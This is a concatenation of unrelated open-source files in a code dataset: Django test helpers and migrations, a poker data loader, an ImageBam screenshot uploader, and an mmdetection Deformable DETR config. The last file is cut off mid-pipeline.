        # Call Price transformer in order to repopulate _currencies cache.
        Price.transformer([])
        return price_obj

    def make_premium(self, addon, price='1.00'):
        """Make `addon` premium at `price` and return the AddonPremium."""
        price_obj = self.make_price(price=Decimal(price))
        addon.update(premium_type=mkt.ADDON_PREMIUM)
        addon._premium = AddonPremium.objects.create(addon=addon,
                                                     price=price_obj)
        # Drop the class-level currency cache so it gets rebuilt.
        if hasattr(Price, '_currencies'):
            del Price._currencies
        return addon._premium

    def create_sample(self, name=None, db=False, **kw):
        """Create a waffle Sample; cache-only unless `db=True`."""
        if name is not None:
            kw['name'] = name
        kw.setdefault('percent', 100)
        sample = Sample(**kw)
        sample.save() if db else cache_sample(instance=sample)
        return sample

    def create_switch(self, name=None, db=False, **kw):
        """Create a waffle Switch (active by default); cache-only unless `db=True`."""
        kw.setdefault('active', True)
        if name is not None:
            kw['name'] = name
        switch = Switch(**kw)
        switch.save() if db else cache_switch(instance=switch)
        return switch

    def create_flag(self, name=None, **kw):
        """Create a waffle Flag, enabled for everyone by default."""
        if name is not None:
            kw['name'] = name
        kw.setdefault('everyone', True)
        return Flag.objects.create(**kw)

    @staticmethod
    def grant_permission(user_obj, rules, name='Test Group'):
        """Creates group with rule, and adds user to group."""
        group = Group.objects.create(name=name, rules=rules)
        GroupUser.objects.create(group=group, user=user_obj)
        return group

    def remove_permission(self, user_obj, rules):
        """Remove a permission from a user."""
        group = Group.objects.get(rules=rules)
        GroupUser.objects.filter(user=user_obj, group=group).delete()

    def days_ago(self, days):
        # Convenience wrapper around the module-level days_ago().
        return days_ago(days)

    def trans_eq(self, trans, locale, localized_string):
        """Assert `trans` has `localized_string` for the given `locale`."""
        eq_(Translation.objects.get(id=trans.id,
                                    locale=locale).localized_string,
            localized_string)

    def extract_script_template(self, html, template_selector):
        """Extracts the inner JavaScript text/template from a html page.

        Example::

            >>> template = extract_script_template(res.content, '#template-id')
            >>> template('#my-jquery-selector')

        Returns a PyQuery object that you can refine using jQuery selectors.
        """
        return pq(pq(html)(template_selector).html())
class MktPaths(object):
    """Mixin for getting common Marketplace Paths."""

    def manifest_path(self, name):
        """Absolute path of a sample webapp manifest used by submit tests."""
        return os.path.join(settings.ROOT,
                            'mkt/submit/tests/webapps/%s' % name)

    def manifest_copy_over(self, dest, name):
        """Copy the sample manifest `name` to `dest` via django storage."""
        # Fix: also manage the source file with a context manager -- the
        # original open() leaked its file handle.
        with open(self.manifest_path(name)) as src:
            with storage.open(dest, 'wb') as f:
                copyfileobj(src, f)

    @staticmethod
    def sample_key():
        """Path to a sample app-signing key."""
        return os.path.join(settings.ROOT,
                            'mkt/webapps/tests/sample.key')

    def sample_packaged_key(self):
        """Path to a sample packaged-app signing certificate."""
        return os.path.join(settings.ROOT,
                            'mkt/webapps/tests/sample.packaged.pem')

    def mozball_image(self):
        """Path to a sample 128px app icon."""
        return os.path.join(settings.ROOT,
                            'mkt/developers/tests/addons/mozball-128.png')

    def packaged_app_path(self, name):
        """Absolute path of a sample packaged app archive."""
        return os.path.join(
            settings.ROOT, 'mkt/submit/tests/packaged/%s' % name)

    def packaged_copy_over(self, dest, name):
        """Copy the sample packaged app `name` to `dest` via django storage."""
        # Same leak fix as manifest_copy_over: close the source file.
        with open(self.packaged_app_path(name)) as src:
            with storage.open(dest, 'wb') as f:
                copyfileobj(src, f)
def assert_no_validation_errors(validation):
"""Assert that the validation (JSON) does not contain a traceback.
Note that this does not test whether the addon passed
validation or not.
"""
if hasattr(validation, 'task_error'):
# FileUpload object:
error = validation.task_error
else:
# Upload detail - JSON output
error = validation['error']
if error:
print '-' * 70
print error
print '-' * 70
raise AssertionError("Unexpected task error: %s" %
error.rstrip().split("\n")[-1])
def _get_created(created):
"""
Returns a datetime.
If `created` is "now", it returns `datetime.datetime.now()`. If `created`
is set use that. Otherwise generate a random datetime in the year 2011.
"""
if created == 'now':
return datetime.now()
elif created:
return created
else:
return datetime(2011,
random.randint(1, 12), # Month
random.randint(1, 28), # Day
random.randint(0, 23), # Hour
random.randint(0, 59), # Minute
random.randint(0, 59)) # Seconds
def req_factory_factory(url='', user=None, post=False, data=None, **kwargs):
    """Creates a request factory, logged in with the user.

    Extra keyword arguments become attributes on the request; `region` is
    special-cased into req.REGION.
    """
    factory = RequestFactory()
    payload = data or {}
    req = factory.post(url, payload) if post else factory.get(url, payload)
    if user:
        req.user = UserProfile.objects.get(id=user.id)
        req.groups = user.groups.all()
    else:
        req.user = AnonymousUser()
    req.check_ownership = partial(check_ownership, req)
    req.REGION = kwargs.pop('region', mkt.regions.REGIONS_CHOICES[0][1])
    req.API_VERSION = 2

    for name, value in kwargs.items():
        setattr(req, name, value)
    return req
# Monotonically-increasing suffix used for generated factory emails.
user_factory_counter = 0


def user_factory(**kw):
    """Create and return a UserProfile.

    If not provided, email will be 'factoryuser<number>@mozilla.com'.
    If email has no '@' it will be corrected to 'email@mozilla.com'
    """
    global user_factory_counter
    # Remember whether the caller supplied an email *before* popping it.
    # The previous check ran after the pop and was therefore always true,
    # bumping the counter even when an explicit email was given.
    email_supplied = 'email' in kw
    email = kw.pop('email', 'factoryuser%d' % user_factory_counter)
    if '@' not in email:
        email = '%s@mozilla.com' % email
    user = UserProfile.objects.create(email=email, **kw)
    if not email_supplied:
        # Keep generated emails unique by staying ahead of existing ids.
        user_factory_counter = user.id + 1
    return user
class ESTestCase(TestCase):
    """Base class for tests that require elasticsearch."""
    # ES is slow to set up so this uses class setup/teardown. That happens
    # outside Django transactions so be careful to clean up afterwards.
    test_es = True
    # Opt out of the MockEsMixin patches: these tests hit a real ES.
    mock_es = False
    exempt_from_fixture_bundling = True  # ES doesn't support bundling (yet?)

    @classmethod
    def setUpClass(cls):
        if not settings.RUN_ES_TESTS:
            raise SkipTest('ES disabled')
        cls.es = elasticsearch.Elasticsearch(hosts=settings.ES_HOSTS)

        # The ES setting are set before we call super()
        # because we may have indexation occuring in upper classes.
        for key, index in settings.ES_INDEXES.items():
            if not index.startswith('test_'):
                settings.ES_INDEXES[key] = 'test_%s' % index

        # Narrow the analyzer map for tests; restored in tearDownClass.
        cls._SEARCH_ANALYZER_MAP = mkt.SEARCH_ANALYZER_MAP
        mkt.SEARCH_ANALYZER_MAP = {
            'english': ['en-us'],
            'spanish': ['es'],
        }
        super(ESTestCase, cls).setUpClass()

    @classmethod
    def setUpTestData(cls):
        """Check ES is reachable, wipe the test indexes and recreate mappings."""
        try:
            cls.es.cluster.health()
        except Exception, e:
            e.args = tuple([u'%s (it looks like ES is not running, '
                            'try starting it or set RUN_ES_TESTS=False)'
                            % e.args[0]] + list(e.args[1:]))
            raise

        for index in set(settings.ES_INDEXES.values()):
            # Get the index that's pointed to by the alias.
            try:
                indices = cls.es.indices.get_aliases(index=index)
                assert indices[index]['aliases']
            except (KeyError, AssertionError):
                # There's no alias, just use the index.
                print 'Found no alias for %s.' % index
            except elasticsearch.NotFoundError:
                pass
            # Remove any alias as well.
            try:
                cls.es.indices.delete(index=index)
            except elasticsearch.NotFoundError as e:
                print 'Could not delete index %r: %s' % (index, e)

        for indexer in reindex.INDEXERS:
            indexer.setup_mapping()

    @classmethod
    def tearDownClass(cls):
        # Restore the analyzer map saved in setUpClass.
        mkt.SEARCH_ANALYZER_MAP = cls._SEARCH_ANALYZER_MAP
        super(ESTestCase, cls).tearDownClass()

    def tearDown(self):
        # Flush any queued indexing tasks before the transaction rollback.
        post_request_task._send_tasks()
        super(ESTestCase, self).tearDown()

    @classmethod
    def refresh(cls, doctypes=None):
        """
        Force an immediate refresh for the index(es) holding the given
        doctype(s) in ES. Both a string corresponding to a single doctypes or a
        list of multiple doctypes are accepted.

        If there are tasks in the post_request_task queue, they are processed
        first.
        """
        post_request_task._send_tasks()
        if doctypes:
            if not isinstance(doctypes, (list, tuple)):
                doctypes = [doctypes]
            indexes = [settings.ES_INDEXES[doctype] for doctype in doctypes]
            try:
                cls.es.indices.refresh(index=indexes)
            except elasticsearch.NotFoundError as e:
                print "Could not refresh indexes '%s': %s" % (indexes, e)

    @classmethod
    def reindex(cls, model):
        """
        Convenience method that re-save all instances of the specified model
        and then refreshes the corresponding ES index.
        """
        # Emit post-save signal so all of the objects get reindexed.
        [o.save() for o in model.objects.all()]
        cls.refresh(doctypes=model.get_indexer().get_mapping_type_name())
class WebappTestCase(TestCase):
    """Base test case that preloads fixture webapp 337141 as `self.app`."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.app = self.get_app()

    def get_app(self):
        """Fetch a fresh copy of the fixture app from the database."""
        return Webapp.objects.get(id=337141)

    def make_game(self, app=None, rated=False):
        """Turn `app` (default: self.app) into a game and return it.

        Fixes over the previous version: the explicitly passed `app` was
        ignored whenever self.app was set, and the reloaded app was
        assigned to a local and never returned.
        """
        return make_game(app or self.app, rated)
def make_game(app, rated):
    """Categorize `app` as a game, optionally content-rate it, and return
    a reloaded copy."""
    app.update(categories=['games'])
    if rated:
        make_rated(app)
    return app.reload()
def make_rated(app):
    """Give `app` a content rating from every ratings body, plus IARC info."""
    ratings = {body: body.ratings[0]
               for body in mkt.ratingsbodies.ALL_RATINGS_BODIES}
    app.set_content_ratings(ratings)
    app.set_iarc_info(123, 'abc')
    app.set_descriptors([])
    app.set_interactives([])
|
Hitechverma/zamboni
|
mkt/site/tests/__init__.py
|
Python
|
bsd-3-clause
| 34,049
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South migration adding the auto_now `updated_at` field to Person."""

    def forwards(self, orm):
        # Adding field 'Person.updated_at'
        # The datetime default only backfills existing rows; auto_now takes
        # over afterwards, so keep_default=False is correct.
        db.add_column('core_person', 'updated_at',
                      self.gf('django.db.models.fields.DateTimeField')(
                          auto_now=True, default=datetime.datetime(
                              2013, 1, 4, 0, 0), blank=True),
                      keep_default=False)

    def backwards(self, orm):
        # Deleting field 'Person.updated_at'
        db.delete_column('core_person', 'updated_at')

    # Frozen ORM snapshot generated by South -- do not edit by hand.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'core.alert': {
            'Meta': {'object_name': 'Alert'},
            'content': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'core.app': {
            'Meta': {'object_name': 'App'},
            'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'icon_file': ('core.thumbs.ImageWithThumbsField', [], {'default': "'app_icons/default.jpg'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'path': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
            'stub': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        },
        'core.notification': {
            'Meta': {'object_name': 'Notification'},
            'actor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': "orm['auth.User']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'obj': ('django.db.models.fields.TextField', [], {}),
            'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': "orm['auth.User']"}),
            'target': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_notifications'", 'to': "orm['auth.User']"}),
            'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.TextField', [], {'max_length': '255'}),
            'uuid': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'verb': ('django.db.models.fields.TextField', [], {'max_length': '255'}),
            'viewed': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
        },
        'core.officelocation': {
            'Meta': {'object_name': 'OfficeLocation'},
            'city': ('django.db.models.fields.CharField', [], {'max_length': '56'}),
            'id': ('django.db.models.fields.CharField', [], {'max_length': '12', 'primary_key': 'True'}),
            'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
            'street': ('django.db.models.fields.CharField', [], {'max_length': '56'}),
            'suite': ('django.db.models.fields.CharField', [], {'max_length': '56', 'null': 'True', 'blank': 'True'}),
            'zip': ('django.db.models.fields.CharField', [], {'max_length': '10'})
        },
        'core.orggroup': {
            'Meta': {'object_name': 'OrgGroup'},
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.OrgGroup']", 'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '128'})
        },
        'core.person': {
            'Meta': {'object_name': 'Person'},
            'allow_tagging': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'current_projects': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'desk_location': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
            'email_notifications': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'home_phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'mobile_phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
            'office_location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.OfficeLocation']", 'null': 'True', 'blank': 'True'}),
            'office_phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
            'org_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.OrgGroup']", 'null': 'True', 'blank': 'True'}),
            'photo_file': ('core.thumbs.ImageWithThumbsField', [], {'default': "'avatars/default.jpg'", 'max_length': '100'}),
            'schools_i_attended': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'stub': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
            'stuff_ive_done': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'things_im_good_at': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
            'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}),
            'what_i_do': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
        },
        'core.wikihighlight': {
            'Meta': {'object_name': 'WikiHighlight'},
            'description': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'posted_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'url': ('django.db.models.fields.CharField', [], {'max_length': '2048'})
        },
        'taggit.tag': {
            'Meta': {'object_name': 'Tag'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '150'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
        },
        'taggit.tagcategory': {
            'Meta': {'object_name': 'TagCategory'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'})
        },
        'taggit.taggeditem': {
            'Meta': {'object_name': 'TaggedItem'},
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
            'create_timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
            'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"}),
            'tag_category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['taggit.TagCategory']", 'null': 'True'}),
            'tag_creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_related'", 'null': 'True', 'to': "orm['auth.User']"})
        }
    }

    complete_apps = ['core']
|
m3brown/collab
|
core/migrations/0002_add_keycache.py
|
Python
|
cc0-1.0
| 11,941
|
from model import Configuration
|
baverman/taburet
|
taburet/config/__init__.py
|
Python
|
mit
| 32
|
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def StorageIORMConfigOption(vim, *args, **kwargs):
    '''Configuration setting ranges for IORMConfigSpec object.'''

    obj = vim.client.factory.create('ns0:StorageIORMConfigOption')

    # There are 3 required properties; count positional and keyword
    # arguments together.  (The previous message claimed "at least 4" and
    # reported only len(args), contradicting the actual check.)
    provided = len(args) + len(kwargs)
    if provided < 3:
        raise IndexError('Expected at least 3 arguments got: %d' % provided)

    required = ['congestionThresholdOption', 'enabledOption',
                'statsCollectionEnabledOption']
    optional = ['dynamicProperty', 'dynamicType']

    # Positional arguments fill required properties first, then optional.
    for name, arg in zip(required + optional, args):
        setattr(obj, name, arg)

    # Keyword arguments must name a known property.
    for name, value in kwargs.items():
        if name in required + optional:
            setattr(obj, name, value)
        else:
            raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))

    return obj
|
xuru/pyvisdk
|
pyvisdk/do/storage_iorm_config_option.py
|
Python
|
mit
| 1,080
|
../../../../share/pyshared/gnome_sudoku/sudoku.py
|
Alberto-Beralix/Beralix
|
i386-squashfs-root/usr/lib/python2.7/dist-packages/gnome_sudoku/sudoku.py
|
Python
|
gpl-3.0
| 49
|
import os
import numpy as np
import random
def load_training_data(folder, randomize_hands=False, randomize_players=False,
                       group=False, training_ratio=0.75, is_preflop=True,
                       max_files=None, min_hands=150, load_all=False):
    """Load per-player poker training arrays from ``.npz`` files in *folder*.

    Each file must contain an ``input`` and ``output`` array, plus a
    ``board`` array when ``is_preflop`` is False.  With ``load_all=True``
    the raw per-player arrays are returned (concatenated across players if
    ``group=True``); otherwise each field is split into train/test parts
    per player, dropping players with fewer than ``min_hands`` hands.
    """
    fields = ['input', 'output']
    if not is_preflop:
        fields.insert(1, 'board')
    arrays = [[] for _ in range(len(fields))]

    files = os.listdir(folder)
    if max_files:
        files = files[:max_files]
    for filename in files:
        filename = os.path.join(folder, filename)
        # np.load opens and manages the file itself; the previous extra
        # text-mode open() produced an unused (and wrongly-moded) handle.
        data = np.load(filename)
        for i, field in enumerate(fields):
            arrays[i].append(data[field])

    if randomize_hands:
        # One permutation per player so all fields stay aligned row-for-row.
        for j, player_arrays in enumerate(zip(*arrays)):
            perm = np.random.permutation(len(player_arrays[0]))
            for i, arr in enumerate(player_arrays):
                arrays[i][j] = arr[perm]
    if randomize_players:
        # Materialize the zips: zip() is a lazy iterator on Python 3 and
        # cannot be shuffled or re-zipped in place.
        players = list(zip(*arrays))
        random.shuffle(players)
        arrays = [list(field) for field in zip(*players)]

    if load_all:
        if group:
            for i, field in enumerate(arrays):
                arrays[i] = np.concatenate(field)
        if is_preflop:
            return arrays
        else:
            return [arrays[0], arrays[1]], arrays[2]

    new_arrays = []
    for i, field in enumerate(arrays):
        train = []
        test = []
        for player in field:
            if len(player) < min_hands:
                continue
            ind = int(len(player) * training_ratio)
            train.append(player[:ind])
            test.append(player[ind:])
        if group:
            train, test = [np.concatenate(x) for x in [train, test]]
        new_arrays.extend([train, test])
    if not is_preflop:
        # Regroup [in_tr, in_te, board_tr, board_te, out_tr, out_te] into
        # ([in_tr, board_tr], [in_te, board_te], out_tr, out_te).
        rearrange = lambda x: [[x[0], x[2]], [x[1], x[3]], x[4], x[5]]
        new_arrays = rearrange(new_arrays)
    return new_arrays
|
session-id/poker-predictor
|
loaders.py
|
Python
|
apache-2.0
| 1,952
|
from __future__ import print_function, unicode_literals, division, absolute_import
import re
import io
import os
import sys
import logging
try:
from bs4 import BeautifulSoup
except ImportError:
logging.critical('You must install "beautifulsoup4" for this script to work. Try "pip install beautifulsoup4".')
sys.exit(1)
import config
from .image_host import BaseImageHost, ImageHostError
class ImageBam(BaseImageHost):
    """Image host backend for imagebam.com.

    Uploads PNG screenshots via the site's form endpoints and scrapes the
    returned HTML for BBCode/HTML links.  Requires ``IMGBAM_USERNAME`` and
    ``IMGBAM_PASSWORD`` to be set in ``config.py``.
    """
    def __init__(self):
        super(ImageBam, self).__init__()
        if not (config.IMGBAM_USERNAME and config.IMGBAM_PASSWORD):
            raise ImageHostError('You must specify your ImageBam username and password in config.py')
        # Form values sent verbatim to the upload endpoint (site expects strings).
        self.thumbnail_size = '350'
        self.thumb_file_type = 'jpg'
        self.gallery_options = '1'
    def __repr__(self):
        return 'ImageBam.com'
    def login(self):
        """Log in to imagebam.com using the credentials from config.py.

        Raises ImageHostError when the site reports a login failure.
        """
        url = 'http://www.imagebam.com/login'
        data = {
            'action': 'true',
            'nick': config.IMGBAM_USERNAME,
            'pw': config.IMGBAM_PASSWORD
        }
        response = self.session.post(url, data=data)
        response.raise_for_status()
        # If we didn't get redirected, something went wrong
        if not response.history:
            soup = BeautifulSoup(response.text, "html.parser")
            error_message = soup.find('div', class_='box_error')
            if error_message:
                logging.error(error_message.string.strip())
            raise ImageHostError('{site} login failed!'.format(site=self))
    def upload(self, image_paths):
        """Upload the given PNG files and scrape the result links.

        Populates ``self.bbcode_links``, ``self.html_links`` and ``self.urls``
        from the gallery HTML returned by the site; returns True on success.
        Raises ImageHostError for an empty list or non-PNG/missing files.
        """
        if not image_paths:
            raise ImageHostError('No files to upload!')
        for image in image_paths:
            if (not os.path.isfile(image)) or (not image.endswith('.png')):
                msg = 'The file "{file}" does not exist or is not a PNG image.'
                raise ImageHostError(msg.format(file=image))
        self.login()
        # Upload files
        url = 'http://www.imagebam.com/sys/upload/save'
        data = {
            'content_type': '0',
            'thumb_size': self.thumbnail_size,
            'thumb_aspect_ratio': 'resize',
            'thumb_file_type': self.thumb_file_type,
            'gallery_options': self.gallery_options,
            'gallery_title': '',
            'gallery_description': ''
        }
        # Build the multipart payload; files are renamed image001.png, image002.png, ...
        files = []
        file_objects = []
        for n in range(len(image_paths)):
            img_num = str(n + 1).zfill(3)
            file_objects.append(io.open(image_paths[n], mode='rb'))
            files.append((
                'file[]',
                (
                    'image{number}.png'.format(number=img_num),
                    file_objects[n]
                )
            ))
        logging.info('Uploading screenshots to ImageBam...')
        response = self.session.post(url, data=data, files=files)
        response.raise_for_status()
        logging.info('Screenshot upload completed: http://www.imagebam.com/gallery-organizer')
        for file_obj in file_objects:
            file_obj.close()
        # Scrape the link table out of the response page with regexes.
        self._html = response.text
        table_regex = re.compile(r'(<table style=\'width:100%;\'>)((.|\s)*?)(</table>)')
        table_html = ''.join(table_regex.findall(self._html)[0])
        bbcode_regex = re.compile(r'\[URL=.*?\[/URL]')
        self.bbcode_links = bbcode_regex.findall(table_html)
        link_regex = re.compile(r'\<a href=.*?></a>')
        self.html_links = link_regex.findall(table_html)
        url_regex = re.compile(r'http://www.imagebam.com/.*?[a-z0-9]{12,18}(?=")')
        self.urls = url_regex.findall(''.join(self.html_links))
        return True
|
hwkns/macguffin
|
image_hosts/imagebam.py
|
Python
|
gpl-3.0
| 3,640
|
# mmdetection config: Deformable DETR, ResNet-50 backbone, trained on COCO
# for 50 epochs.  Inherits the COCO detection dataset and default runtime.
_base_ = [
    '../_base_/datasets/coco_detection.py', '../_base_/default_runtime.py'
]
model = dict(
    type='DeformableDETR',
    backbone=dict(
        type='ResNet',
        depth=50,
        num_stages=4,
        out_indices=(1, 2, 3),
        frozen_stages=1,
        norm_cfg=dict(type='BN', requires_grad=False),
        norm_eval=True,
        style='pytorch',
        init_cfg=dict(type='Pretrained', checkpoint='torchvision://resnet50')),
    neck=dict(
        type='ChannelMapper',
        in_channels=[512, 1024, 2048],
        kernel_size=1,
        out_channels=256,
        act_cfg=None,
        norm_cfg=dict(type='GN', num_groups=32),
        num_outs=4),
    bbox_head=dict(
        type='DeformableDETRHead',
        num_query=300,
        num_classes=80,
        in_channels=2048,
        sync_cls_avg_factor=True,
        as_two_stage=False,
        transformer=dict(
            type='DeformableDetrTransformer',
            encoder=dict(
                type='DetrTransformerEncoder',
                num_layers=6,
                transformerlayers=dict(
                    type='BaseTransformerLayer',
                    attn_cfgs=dict(
                        type='MultiScaleDeformableAttention', embed_dims=256),
                    feedforward_channels=1024,
                    ffn_dropout=0.1,
                    operation_order=('self_attn', 'norm', 'ffn', 'norm'))),
            decoder=dict(
                type='DeformableDetrTransformerDecoder',
                num_layers=6,
                return_intermediate=True,
                transformerlayers=dict(
                    type='DetrTransformerDecoderLayer',
                    attn_cfgs=[
                        dict(
                            type='MultiheadAttention',
                            embed_dims=256,
                            num_heads=8,
                            dropout=0.1),
                        dict(
                            type='MultiScaleDeformableAttention',
                            embed_dims=256)
                    ],
                    feedforward_channels=1024,
                    ffn_dropout=0.1,
                    operation_order=('self_attn', 'norm', 'cross_attn', 'norm',
                                     'ffn', 'norm')))),
        positional_encoding=dict(
            type='SinePositionalEncoding',
            num_feats=128,
            normalize=True,
            offset=-0.5),
        loss_cls=dict(
            type='FocalLoss',
            use_sigmoid=True,
            gamma=2.0,
            alpha=0.25,
            loss_weight=2.0),
        loss_bbox=dict(type='L1Loss', loss_weight=5.0),
        loss_iou=dict(type='GIoULoss', loss_weight=2.0)),
    # training and testing settings
    train_cfg=dict(
        assigner=dict(
            type='HungarianAssigner',
            cls_cost=dict(type='FocalLossCost', weight=2.0),
            reg_cost=dict(type='BBoxL1Cost', weight=5.0, box_format='xywh'),
            iou_cost=dict(type='IoUCost', iou_mode='giou', weight=2.0))),
    test_cfg=dict(max_per_img=100))
img_norm_cfg = dict(
    mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
# train_pipeline, NOTE the img_scale and the Pad's size_divisor is different
# from the default setting in mmdet.
train_pipeline = [
    dict(type='LoadImageFromFile'),
    dict(type='LoadAnnotations', with_bbox=True),
    dict(type='RandomFlip', flip_ratio=0.5),
    dict(
        type='AutoAugment',
        policies=[
            [
                dict(
                    type='Resize',
                    img_scale=[(480, 1333), (512, 1333), (544, 1333),
                               (576, 1333), (608, 1333), (640, 1333),
                               (672, 1333), (704, 1333), (736, 1333),
                               (768, 1333), (800, 1333)],
                    multiscale_mode='value',
                    keep_ratio=True)
            ],
            [
                dict(
                    type='Resize',
                    # The ratio of all images in the train dataset is < 7
                    # follow the original impl
                    img_scale=[(400, 4200), (500, 4200), (600, 4200)],
                    multiscale_mode='value',
                    keep_ratio=True),
                dict(
                    type='RandomCrop',
                    crop_type='absolute_range',
